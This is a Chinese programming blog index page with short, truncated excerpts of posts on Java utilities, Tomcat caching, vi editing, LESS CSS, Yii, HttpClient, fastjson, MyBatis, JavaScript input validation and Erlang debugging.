    参考了 http://zhedahht.blog.163.com/blog/static/25411174201142733927831/ 但是用java来实现有一个问题。 由于Java无法像C那样“传递参数的地址,函数返回时能得到参数的值”,唯有新建一个辅助类:AuxClass import ljn.help.*; public class BalancedBTree {
  • BeanUtils.copyProperties VS PropertyUtils.copyProperties 诸葛不亮 PropertyUtilsBeanUtils
     BeanUtils.copyProperties VS  PropertyUtils.copyProperties  作为两个bean属性copy的工具类,他们被广泛使用,同时也很容易误用,给人造成困然;比如:昨天发现同事在使用BeanUtils.copyProperties copy有integer类型属性的bean时,没有考虑到会将null转换为0,而后面的业
  • [金融与信息安全]最简单的数据结构最安全 comsci 数据结构
          现在最流行的数据库的数据存储文件都具有复杂的文件头格式,用操作系统的记事本软件是无法正常浏览的,这样的情况会有什么问题呢?        从信息安全的角度来看,如果我们数据库系统仅仅把这种格式的数据文件做异地备份,如果相同版本的所有数据库管理系统都同时被攻击,那么
  • vi区段删除 Cwind linuxvi区段删除
    区段删除是编辑和分析一些冗长的配置文件或日志文件时比较常用的操作。简记下vi区段删除要点备忘。   vi概述    引文中并未将末行模式单独列为一种模式。单不单列并不重要,能区分命令模式与末行模式即可。   vi区段删除步骤: 1. 在末行模式下使用:set nu显示行号 非必须,随光标移动vi右下角也会显示行号,能够正确找到并记录删除开始行
  • 清除tomcat缓存的方法总结 dashuaifu tomcat缓存
    用tomcat容器,大家可能会发现这样的问题,修改jsp文件后,但用IE打开 依然是以前的Jsp的页面。 出现这种现象的原因主要是tomcat缓存的原因。 解决办法如下: 在jsp文件头加上 <meta http-equiv="Expires" content="0"> <meta http-equiv="kiben&qu
  • 不要盲目的在项目中使用LESS CSS dcj3sjt126com Webless
     如果你还不知道LESS CSS是什么东西,可以看一下这篇文章,是我一朋友写给新人看的《CSS——LESS》   不可否认,LESS CSS是个强大的工具,它弥补了css没有变量、无法运算等一些“先天缺陷”,但它似乎给我一种错觉,就是为了功能而实现功能。   比如它的引用功能 ? .rounded_corners{     
  • [入门]更上一层楼 dcj3sjt126com PHPyii2
    更上一层楼 通篇阅读完整个“入门”部分,你就完成了一个完整 Yii 应用的创建。在此过程中你学到了如何实现一些常用功能,例如通过 HTML 表单从用户那获取数据,从数据库中获取数据并以分页形式显示。你还学到了如何通过 Gii 去自动生成代码。使用 Gii 生成代码把 Web 开发中多数繁杂的过程转化为仅仅填写几个表单就行。 本章将介绍一些有助于更好使用 Yii 的资源:
  • Apache HttpClient使用详解 eksliang httpclienthttp协议
    Http协议的重要性相信不用我多说了,HttpClient相比传统JDK自带的URLConnection,增加了易用性和灵活性(具体区别,日后我们再讨论),它不仅是客户端发送Http请求变得容易,而且也方便了开发人员测试接口(基于Http协议的),即提高了开发的效率,也方便提高代码的健壮性。因此熟练掌握HttpClient是很重要的必修内容,掌握HttpClient后,相信对于Http协议的了解会
  • zxing二维码扫描功能 gundumw100 androidzxing
    经常要用到二维码扫描功能 现给出示例代码 import com.google.zxing.WriterException; import com.zxing.activity.CaptureActivity; import com.zxing.encoding.EncodingHandler; import android.app.Activity; import an
  • 纯HTML+CSS带说明的黄色导航菜单 ini htmlWebhtml5csshovertree
    HoverTree带说明的CSS菜单:纯HTML+CSS结构链接带说明的黄色导航   在线体验效果:http://hovertree.com/texiao/css/1.htm代码如下,保存到HTML文件可以看到效果:   <!DOCTYPE html > <html > <head> <title>HoverTree
  • fastjson初始化对性能的影响 kane_xie fastjson序列化
    之前在项目中序列化是用thrift,性能一般,而且需要用编译器生成新的类,在序列化和反序列化的时候感觉很繁琐,因此想转到json阵营。对比了jackson,gson等框架之后,决定用fastjson,为什么呢,因为看名字感觉很快。。。   网上的说法:   fastjson 是一个性能很好的 Java 语言实现的 JSON 解析器和生成器,来自阿里巴巴的工程师开发。
  • 基于Mybatis封装的增删改查实现通用自动化sql mengqingyu DAO
    1.基于map或javaBean的增删改查可实现不写dao接口和实现类以及xml,有效的提高开发速度。 2.支持自定义注解包括主键生成、列重复验证、列名、表名等 3.支持批量插入、批量更新、批量删除 <bean id="dynamicSqlSessionTemplate" class="com.mqy.mybatis.support.Dynamic
  • js控制input输入框的方法封装(数字,中文,字母,浮点数等) qifeifei javascript js
    在项目开发的时候,经常有一些输入框,控制输入的格式,而不是等输入好了再去检查格式,格式错了就报错,体验不好。 /** 数字,中文,字母,浮点数(+/-/.) 类型输入限制,只要在input标签上加上 jInput="number,chinese,alphabet,floating" 备注:floating属性只能单独用*/     funct
  • java 计时器应用 tangqi609567707 javatimer
    mport java.util.TimerTask;   import java.util.Calendar;   public class MyTask extends TimerTask {        private static final int
  • erlang输出调用栈信息 wudixiaotie erlang
    在erlang otp的开发中,如果调用第三方的应用,会有有些错误会不打印栈信息,因为有可能第三方应用会catch然后输出自己的错误信息,所以对排查bug有很大的阻碍,这样就要求我们自己打印调用的栈信息。用这个函数:erlang:process_display (self (), backtrace).需要注意这个函数只会输出到标准错误输出。 也可以用这个函数:erlang:get_s
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他